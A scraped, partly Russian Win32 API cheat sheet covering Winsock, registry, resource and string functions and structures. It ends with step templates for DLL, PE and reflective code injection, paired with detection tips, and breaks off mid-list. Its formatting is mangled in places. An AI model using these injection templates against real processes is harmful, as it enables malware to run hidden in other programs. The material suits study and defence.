WSARecv```c int WSARecv( SOCKET s, // Descriptor identifying a connected socket. LPWSABUF lpBuffers, // Array of buffers to receive the incoming data. DWORD dwBufferCount, // Number of buffers in the lpBuffers array. LPDWORD lpNumberOfBytesRecvd, // Pointer to the number of bytes received by this function call. LPDWORD lpFlags, // Flags to modify the behavior of the function call. LPWSAOVERLAPPED lpOverlapped, // Pointer to an overlapped structure for asynchronous operations. LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine // Pointer to the completion routine called when the receive operation has been completed. ); //Receives data from a connected socket, and can also be used for both synchronous and asynchronous data transfer.

root@kitploit:~
[WSASendTo](https://learn.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsasendto)```c
int WSASendTo(
    SOCKET s, // Descriptor identifying a socket.
    LPWSABUF lpBuffers, // Array of buffers containing the data to be sent.
    DWORD dwBufferCount, // Number of buffers in the lpBuffers array.
    LPDWORD lpNumberOfBytesSent, // Pointer to the number of bytes sent by this function call.
    DWORD dwFlags, // Flags to modify the behavior of the function call.
    const struct sockaddr* lpTo, // Pointer to the sockaddr structure for the target address.
    int iToLen, // Size of the address in lpTo.
    LPWSAOVERLAPPED lpOverlapped, // Pointer to an overlapped structure for asynchronous operations.
    LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine // Pointer to the completion routine called when the send operation has been completed.
); // Sends data to a specific destination, for use with connection - less socket types such as SOCK_DGRAM.

WSARecvFrom```c int WSARecvFrom( SOCKET s, // Descriptor identifying a socket. LPWSABUF lpBuffers, // Array of buffers to receive the incoming data. DWORD dwBufferCount, // Number of buffers in the lpBuffers array. LPDWORD lpNumberOfBytesRecvd, // Pointer to the number of bytes received by this function call. LPDWORD lpFlags, // Flags to modify the behavior of the function call. struct sockaddr* lpFrom, // Pointer to an address structure that will receive the source address upon completion of the operation. LPINT lpFromlen, // Pointer to the size of the lpFrom address structure. LPWSAOVERLAPPED lpOverlapped, // Pointer to an overlapped structure for asynchronous operations. LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine // Pointer to the completion routine called when the receive operation has been completed. ); //Receives data from a specific source, used with connection - less socket types such as SOCK_DGRAM.

root@kitploit:~
[WSAAsyncSelect](https://learn.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsaasyncselect)```c
int WSAAsyncSelect(
    SOCKET s, // Descriptor identifying the socket.
    HWND hWnd, // Handle to the window which should receive the message.
    unsigned int wMsg, // Message to be received when an event occurs.
    long lEvent // Bitmask specifying a group of conditions to be monitored.
); // Requests Windows message - based notification of network events for a socket.

socket```c SOCKET socket( int af, int type, int protocol ); // Creates a new socket for network communication.

root@kitploit:~
[bind](https://docs.microsoft.com/en-us/windows/win32/api/winsock/nf-winsock-bind)```c
int bind(
    SOCKET s, 
    const struct sockaddr *name, 
    int namelen
); // Binds a socket to a specific local address and port.

listen```c int listen( SOCKET s, int backlog ); // Sets a socket to listen for incoming connections.

root@kitploit:~
[accept](https://learn.microsoft.com/en-us/windows/win32/api/Winsock2/nf-winsock2-accept)```c
SOCKET accept(
    SOCKET s, 
    struct sockaddr *addr, 
    int *addrlen
); // Accepts a new incoming connection on a listening socket.

connect```c int connect( SOCKET s, const struct sockaddr *name, int namelen ); // Initiates a connection on a socket to a remote address.

root@kitploit:~
[send](https://learn.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-send)```c
int send(
    SOCKET s, 
    const char *buf, 
    int len, 
    int flags
); // Sends data on a connected socket.

recv```c int recv( SOCKET s, char *buf, int len, int flags ); // Receives data from a connected socket.

root@kitploit:~
[closesocket](https://learn.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-closesocket)```c
int closesocket(
    SOCKET s
); //Closes a socket and frees its resources.

gethostbyname```c hostent* gethostbyname( const char* name // either a hostname or an IPv4 address in dotted-decimal notation ); // returns a pointer to a hostent struct. NOTE: Typically better to use getaddrinfo

root@kitploit:~
### Операции с реестром
[RegOpenKeyExW](https://learn.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regopenkeyexw)```c
LONG RegOpenKeyExW(
    HKEY hKey, 
    LPCWTSTR lpSubKey, 
    DWORD ulOptions, 
    REGSAM samDesired, 
    PHKEY phkResult
); // Opens the specified registry key.

RegQueryValueExW```c LONG RegQueryValueExW( HKEY hKey, LPCWTSTR lpValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData ); // Retrieves the type and data of the specified value name associated with an open registry key.

root@kitploit:~
[RegSetValueExW](https://learn.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regsetvalueexw)```c
LONG RegSetValueEx(
    HKEY hKey, 
    LPCWTSTR lpValueName, 
    DWORD Reserved, 
    DWORD dwType, 
    const BYTE *lpData, 
    DWORD cbData
); // Sets the data and type of the specified value name associated with an open registry key.

RegCloseKey```c LONG RegCloseKey( HKEY hKey ); // Closes a handle to the specified registry key.

root@kitploit:~
[RegCreateKeyExA](https://learn.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regcreatekeyexa)```c
LSTATUS RegCreateKeyExA(
  [in]            HKEY                        hKey,
  [in]            LPCSTR                      lpSubKey,
                  DWORD                       Reserved,
  [in, optional]  LPSTR                       lpClass,
  [in]            DWORD                       dwOptions,
  [in]            REGSAM                      samDesired,
  [in, optional]  const LPSECURITY_ATTRIBUTES lpSecurityAttributes,
  [out]           PHKEY                       phkResult,
  [out, optional] LPDWORD                     lpdwDisposition
); // Creates the specified registry key. If the key already exists, the function opens it. Note that key names are not case sensitive. 

RegSetValueExA```c LSTATUS RegSetValueExA( [in] HKEY hKey, [in, optional] LPCSTR lpValueName, DWORD Reserved, [in] DWORD dwType, [in] const BYTE *lpData, [in] DWORD cbData ); // Sets the data and type of a specified value under a registry key.

root@kitploit:~
[RegCreateKeyA](https://learn.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regcreatekeya)```c
LSTATUS RegCreateKeyA(
  [in]           HKEY   hKey,
  [in, optional] LPCSTR lpSubKey,
  [out]          PHKEY  phkResult
); // Creates the specified registry key. If the key already exists in the registry, the function opens it.

RegDeleteKeyA```c LSTATUS RegDeleteKeyA( [in] HKEY hKey, [in] LPCSTR lpSubKey ); // Deletes a subkey and its values. Note that key names are not case sensitive.

root@kitploit:~
[NtRenameKey](https://learn.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntrenamekey)```c
__kernel_entry NTSTATUS NtRenameKey(
  [in] HANDLE          KeyHandle,
  [in] PUNICODE_STRING NewName
); // Changes the name of the specified registry key.

Обработка ошибок

WSAGetLastError```c int WSAGetLastError( void ); // Returns the error status for the last Windows Sockets operation that failed.

root@kitploit:~
[WSASetLastError](https://docs.microsoft.com/en-us/windows/win32/api/winsock/nf-winsock-wsasetlasterror)```c
void WSASetLastError(
    int iError
); // Sets the error status for the last Windows Sockets operation.

WSAGetOverlappedResult```c BOOL WSAGetOverlappedResult( SOCKET s, LPWSAOVERLAPPED lpOverlapped, LPDWORD lpcbTransfer, BOOL fWait, LPDWORD lpdwFlags ); // Determines the results of an overlapped operation on the specified socket.

root@kitploit:~
[WSAIoctl](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsaioctl)```c
int WSAIoctl(
    SOCKET s, 
    DWORD dwIoControlCode, 
    LPVOID lpvInBuffer, 
    DWORD cbInBuffer, 
    LPVOID lpvOutBuffer, 
    DWORD cbOutBuffer, 
    LPDWORD lpcbBytesReturned, 
    LPWSAOVERLAPPED lpOverlapped, 
    LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine
); // Controls the mode of a socket.

WSACreateEvent```c WSAEVENT WSACreateEvent( void ); // Creates a new event object.

root@kitploit:~
[WSASetEvent](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsasetevent)```c
BOOL WSASetEvent(
    WSAEVENT hEvent
); // Sets the state of the specified event object to signaled.

WSAResetEvent```c BOOL WSAResetEvent( WSAEVENT hEvent ); // Sets the state of the specified event object to nonsignaled.

root@kitploit:~
[WSACloseEvent](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsacloseevent)```c
BOOL WSACloseEvent(
    WSAEVENT hEvent
); // Closes an open event object handle.

WSAWaitForMultipleEvents```c DWORD WSAWaitForMultipleEvents( DWORD cEvents, const WSAEVENT *lphEvents, BOOL fWaitAll, DWORD dwTimeout, BOOL fAlertable ); // Waits for multiple event objects and returns when the specified events are signaled or the time-out interval elapses.

root@kitploit:~
### Управление ресурсами
[FindResource](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-findresourcea)```c
HRSRC FindResource(
  [in, optional] HMODULE hModule,   // A handle to the module whose portable executable file or an accompanying MUI file contains the resource. If this parameter is NULL, the function searches the module used to create the current process.
  [in]           LPCSTR  lpName,    // The name of the resource.
  [in]           LPCSTR  lpType     // The resource type.
); // Determines the location of a resource with the specified type and name in the specified module.
root@kitploit:~
HRSRC res = FindResource(NULL, MAKEINTRESOURCE(FAVICON_ICO), RT_RCDATA);

LoadResource```c HGLOBAL LoadResource( [in, optional] HMODULE hModule, // A handle to the module whose executable file contains the resource. [in] HRSRC hResInfo // A handle to the resource to be loaded. ); // Retrieves a handle that can be used to obtain a pointer to the first byte of the specified resource in memory.

root@kitploit:~
```c
HGLOBAL resHandle = resHandle = LoadResource(NULL, res);

LockResource```c LPVOID LockResource( [in] HGLOBAL hResData // A handle to the resource to be accessed ); // Retrieves a pointer to the specified resource in memory.

root@kitploit:~
```c
unsigned char * payload = (char *) LockResource(resHandle);

SizeofResource```c DWORD SizeofResource( [in, optional] HMODULE hModule, // A handle to the module whose executable file contains the resource [in] HRSRC hResInfo // A handle to the resource. This handle must be created by using FindResource ); // Retrieves the size, in bytes, of the specified resource.

root@kitploit:~
```c
unsigned int payload_len = SizeofResource(NULL, res);

Функции для работы с Unicode-строками```c

#include <wchar.h> // for wide character string routines

root@kitploit:~
### Длина строки```c
size_t wcslen(
    const wchar_t *str
); // Returns the length of the given wide string.

Копирование строки

[wcscpy]```c wchar_t *wcscpy( wchar_t *dest, const wchar_t *src ); // Copies the wide string from src to dest.

root@kitploit:~
[wcsncpy]```c
wchar_t *wcsncpy(
    wchar_t *dest, 
    const wchar_t *src, 
    size_t count
); // Copies at most count characters from the wide string src to dest.

Конкатенация строк

[wcscat]```c wchar_t *wcscat( wchar_t *dest, const wchar_t *src ); // Appends the wide string src to the end of the wide string dest.

root@kitploit:~
[wcsncat]```c
wchar_t *wcsncat(
    wchar_t *dest, 
    const wchar_t *src, 
    size_t count
); // Appends at most count characters from the wide string src to the end of the wide string dest.

Сравнение строк

[wcscmp]```c int wcscmp( const wchar_t *str1, const wchar_t *str2 ); // Compares two wide strings lexicographically.

root@kitploit:~
[wcsncmp]```c
int wcsncmp(
    const wchar_t *str1, 
    const wchar_t *str2, 
    size_t count
); // Compares up to count characters of two wide strings lexicographically.

[_wcsicmp]```c int _wcsicmp( const wchar_t *str1, const wchar_t *str2 ); // Compares two wide strings lexicographically, ignoring case.

root@kitploit:~
[_wcsnicmp]```c
int _wcsnicmp(
    const wchar_t *str1, 
    const wchar_t *str2, 
    size_t count
); // Compares up to count characters of two wide strings lexicographically, ignoring case.

Поиск строки

[wcschr]```c wchar_t *wcschr( const wchar_t *str, wchar_t c ); // Finds the first occurrence of the wide character c in the wide string str.

root@kitploit:~
[wcsrchr]```c
wchar_t *wcsrchr(
    const wchar_t *str, 
    wchar_t c
); // Finds the last occurrence of the wide character c in the wide string str.

[wcspbrk]```c wchar_t *wcspbrk( const wchar_t *str1, const wchar_t *str2 ); // Finds the first occurrence in the wide string str1 of any character from the wide string str2.

root@kitploit:~
[wcsstr]```c
wchar_t *wcsstr(
    const wchar_t *str1, 
    const wchar_t *str2
); // Finds the first occurrence of the wide string str2 in the wide string str1.

[wcstok]```c wchar_t *wcstok( wchar_t *str, const wchar_t *delimiters ); // Splits the wide string str into tokens based on the delimiters.

root@kitploit:~
### Классификация и преобразование символов
[towupper]```c
wint_t towupper(
    wint_t c
); // Converts a wide character to uppercase.

[towlower]```c wint_t towlower( wint_t c ); // Converts a wide character to lowercase.

root@kitploit:~
[iswalpha]```c
int iswalpha(
    wint_t c
); // Checks if the wide character is an alphabetic character.

[iswdigit]```c int iswdigit( wint_t c ); // Checks if the wide character is a decimal digit.

root@kitploit:~
[iswalnum]```c
int iswalnum(
    wint_t c
); // Checks if the wide character is an alphanumeric character.

[iswspace]```c int iswspace( wint_t c ); // Checks if the wide character is a whitespace character.

root@kitploit:~
[iswxdigit]```c
int iswxdigit(
    wint_t c
); // Checks if the wide character is a valid hexadecimal digit.

Шпаргалка по структурам Win32

Общие структуры

SYSTEM_INFO```cpp #include <sysinfoapi.h> // Contains information about the current computer system, including the architecture and type of the processor, the number of processors, and the page size. typedef struct _SYSTEM_INFO { union { DWORD dwOemId; struct { WORD wProcessorArchitecture; WORD wReserved; } DUMMYSTRUCTNAME; } DUMMYUNIONNAME; DWORD dwPageSize; LPVOID lpMinimumApplicationAddress; LPVOID lpMaximumApplicationAddress; DWORD_PTR dwActiveProcessorMask; DWORD dwNumberOfProcessors; DWORD dwProcessorType; DWORD dwAllocationGranularity; WORD wProcessorLevel; WORD wProcessorRevision; } SYSTEM_INFO;

root@kitploit:~
[**`FILETIME`**](https://docs.microsoft.com/en-us/windows/win32/api/minwinbase/ns-minwinbase-filetime)```cpp
#include <minwinbase.h>
// Represents the number of 100-nanosecond intervals since January 1, 1601 (UTC). Used for file and system time.
typedef struct _FILETIME {
    DWORD dwLowDateTime;
    DWORD dwHighDateTime;
} FILETIME;

STARTUPINFO```cpp #include <processthreadsapi.h> // Specifies the window station, desktop, standard handles, and appearance of the main window for a process at creation time. typedef struct _STARTUPINFOA { DWORD cb; LPSTR lpReserved; LPSTR lpDesktop; LPSTR lpTitle; DWORD dwX; DWORD dwY; DWORD dwXSize; DWORD dwYSize; DWORD dwXCountChars; DWORD dwYCountChars; DWORD dwFillAttribute; DWORD dwFlags; WORD wShowWindow; WORD cbReserved2; LPBYTE lpReserved2; HANDLE hStdInput; HANDLE hStdOutput; HANDLE hStdError; } STARTUPINFOA, *LPSTARTUPINFOA;

root@kitploit:~
[**`PROCESS_INFORMATION`**](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/ns-processthreadsapi-process_information)```cpp
#include <processthreadsapi.h>
// Contains information about a newly created process and its primary thread.
typedef struct _PROCESS_INFORMATION {
    HANDLE hProcess;
    HANDLE hThread;
    DWORD  dwProcessId;
    DWORD  dwThreadId;
} PROCESS_INFORMATION, *LPPROCESS_INFORMATION;

PROCESSENTRY32```c #include <tlhelp32.h> typedef struct tagPROCESSENTRY32 { DWORD dwSize; DWORD cntUsage; DWORD th32ProcessID; ULONG_PTR th32DefaultHeapID; DWORD th32ModuleID; DWORD cntThreads; DWORD th32ParentProcessID; LONG pcPriClassBase; DWORD dwFlags; CHAR szExeFile[MAX_PATH]; } PROCESSENTRY32;

root@kitploit:~
[**`SECURITY_ATTRIBUTES`**](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa379560(v=vs.85))```cpp
// Determines whether the handle can be inherited by child processes and specifies a security descriptor for a new object.
typedef struct _SECURITY_ATTRIBUTES {
    DWORD  nLength;
    LPVOID lpSecurityDescriptor;
    BOOL   bInheritHandle;
} SECURITY_ATTRIBUTES, *LPSECURITY_ATTRIBUTES;

OVERLAPPED```cpp #inluce <minwinbase.h> // Contains information used in asynchronous (also known as overlapped) input and output (I/O) operations. typedef struct _OVERLAPPED { ULONG_PTR Internal; ULONG_PTR InternalHigh; union { struct { DWORD Offset; DWORD OffsetHigh; } DUMMYSTRUCTNAME; PVOID Pointer; } DUMMYUNIONNAME; HANDLE hEvent; } OVERLAPPED, *LPOVERLAPPED;

root@kitploit:~
[**`GUID`**](https://docs.microsoft.com/en-us/windows/win32/api/guiddef/ns-guiddef-guid)```cpp
#include <guiddef.h>
// Represents a globally unique identifier (GUID), used to identify objects, interfaces, and other items.
typedef struct _GUID {
    unsigned long  Data1;
    unsigned short Data2;
    unsigned short Data3;
    unsigned char  Data4[8];
} GUID;

MEMORY_BASIC_INFORMATION```cpp #include <winnt.h> // Contains information about a range of pages in the virtual address space of a process. typedef struct _MEMORY_BASIC_INFORMATION { PVOID BaseAddress; PVOID AllocationBase; DWORD AllocationProtect; SIZE_T RegionSize; DWORD State; DWORD Protect; DWORD Type; } MEMORY_BASIC_INFORMATION, *PMEMORY_BASIC_INFORMATION;

root@kitploit:~
[**`SYSTEMTIME`**](https://docs.microsoft.com/en-us/windows/win32/api/minwinbase/ns-minwinbase-systemtime)```cpp
#include <minwinbase.h>
// Specifies a date and time, using individual members for the month, day, year, weekday, hour, minute, second, and millisecond.
typedef struct _SYSTEMTIME {
    WORD wYear;
    WORD wMonth;
    WORD wDayOfWeek;
    WORD wDay;
    WORD wHour;
    WORD wMinute;
    WORD wSecond;
    WORD wMilliseconds;
} SYSTEMTIME, *PSYSTEMTIME, *LPSYSTEMTIME;

COORD```cpp // Defines the coordinates of a character cell in a console screen buffer, where the origin (0,0) is at the top-left corner. typedef struct _COORD { SHORT X; SHORT Y; } COORD, *PCOORD;

root@kitploit:~
[**`SMALL_RECT`**](https://docs.microsoft.com/en-us/windows/console/small-rect-str)```cpp
//  Defines the coordinates of the upper left and lower right corners of a rectangle.
typedef struct _SMALL_RECT {
    SHORT Left;
    SHORT Top;
    SHORT Right;
    SHORT Bottom;
} SMALL_RECT;

CONSOLE_SCREEN_BUFFER_INFO```cpp // Contains information about a console screen buffer. typedef struct _CONSOLE_SCREEN_BUFFER_INFO { COORD dwSize; COORD dwCursorPosition; WORD wAttributes; SMALL_RECT srWindow; COORD dwMaximumWindowSize; } CONSOLE_SCREEN_BUFFER_INFO, *PCONSOLE_SCREEN_BUFFER_INFO;

root@kitploit:~
[**`WSADATA`**](https://docs.microsoft.com/en-us/windows/win32/api/winsock/ns-winsock-wsadata)```cpp
#include <winsock.h>
// Contains information about the Windows Sockets implementation.
typedef struct WSAData {
    WORD           wVersion;
    WORD           wHighVersion;
    unsigned short iMaxSockets;
    unsigned short iMaxUdpDg;
    char FAR       *lpVendorInfo;
    char           szDescription[WSADESCRIPTION_LEN+1];
    char           szSystemStatus[WSASYS_STATUS_LEN+1];
} WSADATA, *LPWSADATA;

[CRITICAL_SECTION](struct RTL_CRITICAL_SECTION (nirsoft.net))```c++ // Represents a critical section object, which is used to provide synchronization access to a shared resource. typedef struct _RTL_CRITICAL_SECTION { PRTL_CRITICAL_SECTION_DEBUG DebugInfo; LONG LockCount; LONG RecursionCount; HANDLE OwningThread; HANDLE LockSemaphore; ULONG_PTR SpinCount; } RTL_CRITICAL_SECTION, *PRTL_CRITICAL_SECTION;

root@kitploit:~
[**`WSAPROTOCOL_INFO`**](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/ns-winsock2-wsaprotocol_infoa)```c++
#include <winsock2.h>
// Contains Windows Sockets protocol information.
typedef struct _WSAPROTOCOL_INFOA {
    DWORD          dwServiceFlags1;
    DWORD          dwServiceFlags2;
    DWORD          dwServiceFlags3;
    DWORD          dwServiceFlags4;
    DWORD          dwProviderFlags;
    GUID           ProviderId;
    DWORD          dwCatalogEntryId;
    WSAPROTOCOLCHAIN ProtocolChain;
    int            iVersion;
    int            iAddressFamily;
    int            iMaxSockAddr;
    int            iMinSockAddr;
    int            iSocketType;
    int            iProtocol;
    int            iProtocolMaxOffset;
    int            iNetworkByteOrder;
    int            iSecurityScheme;
    DWORD          dwMessageSize;
    DWORD          dwProviderReserved;
    CHAR           szProtocol[WSAPROTOCOL_LEN+1];
} WSAPROTOCOL_INFOA, *LPWSAPROTOCOL_INFOA;

MSGHDR```c++ #include <ws2def.h> // Contains message information for use with the sendmsg and recvmsg functions. typedef struct _WSAMSG { LPSOCKADDR name; INT namelen; LPWSABUF lpBuffers; ULONG dwBufferCount; WSABUF Control; ULONG dwFlags; } WSAMSG, *PWSAMSG, *LPWSAMSG;

root@kitploit:~
### Шпаргалка по структурам Win32 Sockets (winsock.h)
[**`SOCKADDR`**](https://docs.microsoft.com/en-us/windows/win32/api/winsock/ns-winsock-sockaddr)```cpp
// A generic socket address structure used for compatibility with various address families.
typedef struct sockaddr {
    u_short sa_family;
    char    sa_data[14];
} SOCKADDR, *PSOCKADDR, *LPSOCKADDR;

SOCKADDR_IN```cpp // Represents an IPv4 socket address, containing the IPv4 address, port number, and address family. typedef struct sockaddr_in { short sin_family; u_short sin_port; struct in_addr sin_addr; char sin_zero[8]; } SOCKADDR_IN, *PSOCKADDR_IN, *LPSOCKADDR_IN;

root@kitploit:~
[**`LINGER`**](https://docs.microsoft.com/en-us/windows/win32/api/winsock/ns-winsock-linger)```cpp
// Used to set the socket option SO_LINGER, which determines the action taken when unsent data is queued on a socket and a `closesocket` is performed.
typedef struct linger {
    u_short l_onoff;
    u_short l_linger;
} LINGER, *PLINGER, *LPLINGER;

TIMEVAL```cpp // Represents a time interval, used with the select function to specify a timeout period. typedef struct timeval { long tv_sec; long tv_usec; } TIMEVAL, *PTIMEVAL, *LPTIMEVAL;

root@kitploit:~
[**`FD_SET`**](https://docs.microsoft.com/en-us/windows/win32/api/winsock/ns-winsock-fd_set)```cpp
// Represents a set of sockets used with the `select` function to check for socket events.
typedef struct fd_set {
    u_int fd_count;
    SOCKET fd_array[FD_SETSIZE];
} fd_set, *Pfd_set, *LPfd_set;

Шпаргалка по структурам сокетов Win32 (winsock2.h)

IN_ADDR```cpp // Represents an IPv4 address. typedef struct in_addr { union { struct { u_char s_b1, s_b2, s_b3, s_b4; } S_un_b; struct { u_short s_w1, s_w2; } S_un_w; u_long S_addr; } S_un; } IN_ADDR, *PIN_ADDR, *LPIN_ADDR;

root@kitploit:~
### Шпаргалка по структурам сокетов Win32 (ws2def.h)
[**`ADDRINFO`**](https://learn.microsoft.com/en-us/windows/win32/api/ws2def/ns-ws2def-addrinfow)```cpp
#include <ws2def.h>
// Contains information about an address for use with the `getaddrinfo` function, and is used to build a linked list of addresses.
typedef struct addrinfoW {
    int             ai_flags;
    int             ai_family;
    int             ai_socktype;
    int             ai_protocol;
    size_t          ai_addrlen;
    PWSTR           *ai_canonname;
    struct sockaddr *ai_addr;
    struct addrinfo *ai_next;
} ADDRINFOW, *PADDRINFOW;

WSABUF```cpp #include <ws2def.h> // Contains a pointer to a buffer and its length. Used for scatter/gather I/O operations. typedef struct _WSABUF { ULONG len; __field_bcount(len) CHAR FAR *buf; } WSABUF, FAR * LPWSABUF;

root@kitploit:~
[**`SOCKADDR_IN6`**](https://docs.microsoft.com/en-us/windows/win32/api/ws2ipdef/ns-ws2ipdef-sockaddr_in6)```cpp
#include <ws2ipdef.h>
// Represents an IPv6 socket address, containing the IPv6 address, port number, flow info, and address family.
typedef struct sockaddr_in6 {
    short          sin6_family;
    u_short        sin6_port;
    u_long         sin6_flowinfo;
    struct in6_addr sin6_addr;
    u_long         sin6_scope_id;
} SOCKADDR_IN6, *PSOCKADDR_IN6, *LPSOCKADDR_IN6;

IN6_ADDR```cpp #include <in6addr.h> // Represents an IPv6 address. typedef struct in6_addr { union { u_char Byte[16]; u_short Word[8]; } u; } IN6_ADDR, *PIN6_ADDR, *LPIN6_ADDR;

root@kitploit:~
# Техники внедрения кода

## 1. Внедрение DLL

Этот метод заставляет процесс загрузить вредоносную DLL.

Ключевые API:
- [`OpenProcess`](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess)  ```c
  HANDLE OpenProcess(
    DWORD dwDesiredAccess,
    BOOL  bInheritHandle,
    DWORD dwProcessId
  );

VirtualAllocEx ```c LPVOID VirtualAllocEx( HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect );

root@kitploit:~
- [`WriteProcessMemory`](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-writeprocessmemory)  ```c
BOOL WriteProcessMemory(
  HANDLE  hProcess,
  LPVOID  lpBaseAddress,
  LPCVOID lpBuffer,
  SIZE_T  nSize,
  SIZE_T  *lpNumberOfBytesWritten
);
  • CreateRemoteThread ```c HANDLE CreateRemoteThread( HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId );
    root@kitploit:~
  • GetProcAddress ```c FARPROC GetProcAddress( HMODULE hModule, LPCSTR lpProcName );
    root@kitploit:~
  • LoadLibrary ```c HMODULE LoadLibraryA( LPCSTR lpLibFileName );
    root@kitploit:~
  • NtCreateThread (Недокументированный) ```c NTSTATUS NTAPI NtCreateThread( OUT PHANDLE ThreadHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN HANDLE ProcessHandle, OUT PCLIENT_ID ClientId, IN PCONTEXT ThreadContext, IN PINITIAL_TEB InitialTeb, IN BOOLEAN CreateSuspended );
    root@kitploit:~
  • RtlCreateUserThread (Недокументированный) ```c NTSTATUS NTAPI RtlCreateUserThread( IN HANDLE ProcessHandle, IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL, IN BOOLEAN CreateSuspended, IN ULONG StackZeroBits, IN OUT PULONG StackReserved, IN OUT PULONG StackCommit, IN PVOID StartAddress, IN PVOID StartParameter OPTIONAL, OUT PHANDLE ThreadHandle, OUT PCLIENT_ID ClientId );

Template:

  1. Откройте целевой процесс с помощью OpenProcess
  2. Выделите память в целевом процессе с помощью VirtualAllocEx
  3. Запишите путь к DLL в выделенную память с помощью WriteProcessMemory
  4. Получите адрес LoadLibraryA с помощью GetProcAddress
  5. Создайте удалённый поток в целевом процессе с помощью CreateRemoteThread, указав адрес LoadLibraryA в качестве параметра lpStartAddress.
  6. (Необязательно) Используйте NtCreateThread или RtlCreateUserThread для альтернативных методов создания потоков

Обнаружение и защита:

  • Отслеживайте подозрительные паттерны доступа к процессам и выделения памяти
  • Используйте белые списки приложений, чтобы предотвратить загрузку неавторизованных DLL
  • Внедрите проверки целостности процессов
  • Используйте такие инструменты, как Process Monitor от Microsoft, для обнаружения попыток внедрения DLL

2. PE Injection

Эта техника включает запись и выполнение вредоносного кода в удалённом процессе или в том же процессе (самоинъекция).

Ключевые API:

  • OpenThread ```c HANDLE OpenThread( DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwThreadId );
    root@kitploit:~
  • SuspendThread ```c DWORD SuspendThread( HANDLE hThread );
    root@kitploit:~
  • VirtualAllocEx (см. выше)
  • WriteProcessMemory (см. выше)
  • SetThreadContext ```c BOOL SetThreadContext( HANDLE hThread, const CONTEXT *lpContext );
    root@kitploit:~
  • ResumeThread ```c DWORD ResumeThread( HANDLE hThread );
    root@kitploit:~
  • NtResumeThread (недокументированный) ```c NTSTATUS NTAPI NtResumeThread( IN HANDLE ThreadHandle, OUT PULONG PreviousSuspendCount OPTIONAL );

Шаблон:

  1. Откройте целевой поток с помощью OpenThread
  2. Приостановите поток с помощью SuspendThread
  3. Выделите память в целевом процессе с помощью VirtualAllocEx
  4. Запишите вредоносный код в выделенную память с помощью WriteProcessMemory
  5. Измените контекст потока, чтобы он указывал на внедрённый код, с помощью SetThreadContext
  6. Возобновите поток с помощью ResumeThread или NtResumeThread

Обнаружение и защита:

  • Отслеживайте необычные паттерны приостановки и возобновления потоков
  • Внедряйте проверки целостности памяти
  • Используйте решения Endpoint Detection and Response (EDR) для обнаружения подозрительных изменений памяти
  • Применяйте методы сканирования памяти процессов в реальном времени

3. Рефлексивная инъекция

Похожа на PE-инъекцию, но позволяет избежать использования LoadLibrary и CreateRemoteThread. Предполагает написание собственного загрузчика, который может загружать DLL из памяти без использования стандартного загрузчика Windows.

Ключевые API:

  • CreateFileMapping ```c HANDLE CreateFileMappingA( HANDLE hFile, LPSECURITY_ATTRIBUTES lpFileMappingAttributes, DWORD flProtect, DWORD dwMaximumSizeHigh, DWORD dwMaximumSizeLow, LPCSTR lpName );
    root@kitploit:~
  • MapViewOfFile ```c LPVOID MapViewOfFile( HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow, SIZE_T dwNumberOfBytesToMap );
    root@kitploit:~
  • OpenProcess (см. выше)
  • memcpy ```c void *memcpy( void *dest, const void *src, size_t count );
    root@kitploit:~
  • ZwMapViewOfSection (Документировано для режима ядра) ```c NTSTATUS ZwMapViewOfSection( HANDLE SectionHandle, HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, SECTION_INHERIT InheritDisposition, ULONG AllocationType, ULONG Win32Protect );
    root@kitploit:~
  • CreateThread (см. CreateRemoteThread выше)

Дополнительные API, иногда используемые:

  • VirtualQueryEx ```c SIZE_T VirtualQueryEx( HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength );
    root@kitploit:~

ReadProcessMemory ```c BOOL ReadProcessMemory( HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead );

root@kitploit:~
Шаблон:
1. Создайте файловое отображение DLL с помощью `CreateFileMapping`
2. Спроецируйте представление файла с помощью `MapViewOfFile`
3. Откройте целевой процесс с помощью `OpenProcess`
4. Выделите память в целевом процессе с помощью `VirtualAllocEx`
5. Скопируйте содержимое DLL в выделенную память с помощью `WriteProcessMemory`
6. Выполните ручную загрузку и релокацию DLL в целевом процессе
- Разберите PE-заголовки
- Выделите память для каждой секции
